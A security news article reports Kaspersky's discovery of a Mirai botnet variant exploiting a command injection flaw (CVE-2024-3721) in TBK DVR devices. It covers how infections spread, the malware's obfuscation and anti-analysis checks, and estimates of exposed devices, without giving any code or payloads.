A command injection flaw in internet-connected digital video recorders used for CCTV monitoring is the target of a Mirai botnet malware variant, which allows hackers to take over the devices and add them to a botnet.
Cybersecurity researchers at Russian cybersecurity firm Kaspersky discovered a CVE-2024-3721 exploit while analysing logs from their Linux honeypot system. The issue is a command injection vulnerability found in internet-connected digital video recorders used for CCTV surveillance. Further analysis revealed that the activity was related to a form of the Mirai botnet, which exploited this issue in TBK-manufactured DVR devices to compromise and control them.
The vulnerability was initially discovered by security researcher "netsecfish" in April 2024. By adjusting parameters like mdb and mdc, the researcher released a proof-of-concept showing how a carefully designed post request to a specific URL can trigger shell command execution. Kaspersky confirmed that this precise technique is being utilised in the wild, with its Linux honeypots catching ongoing exploitation attempts linked to a Mirai botnet variant that uses netsecfish's proof-of-concept to compromise vulnerable DVRs.
Nearly a decade ago, an anonymous source made the Mirai source code available online. It continues to act as the foundation for other evolving botnet efforts. The variant aimed at DVR systems expands on Mirai's initial foundation with extra features such as RC4-based string obfuscation, checks to avoid virtual machine environments, and anti-emulation methods.
The exploit is used by the attackers to transmit a malicious ARM32 program to the target device, which then connects to a command-and-control server and joins the botnet. The infected device can be used to launch distributed denial-of-service attacks, forward malicious traffic, and engage in other malicious actions.
This Mirai variation uses a basic RC4 technique to decode its internal strings, with the decryption key disguised using XOR. After decryption, the strings are saved in a global list and used throughout runtime. To evade analysis, the virus runs anti-virtualization and anti-emulation checks on active processes for indicators of environments such as VMware or QEMU.
Last year, Netsecfish reported that around 114,000 DVR devices were vulnerable to CVE-2024-3721. Kaspersky estimates the figure to be closer to 50,000. The majority of infections associated with this Mirai variation are found in Brazil, Russia, Egypt, China, India, and Ukraine.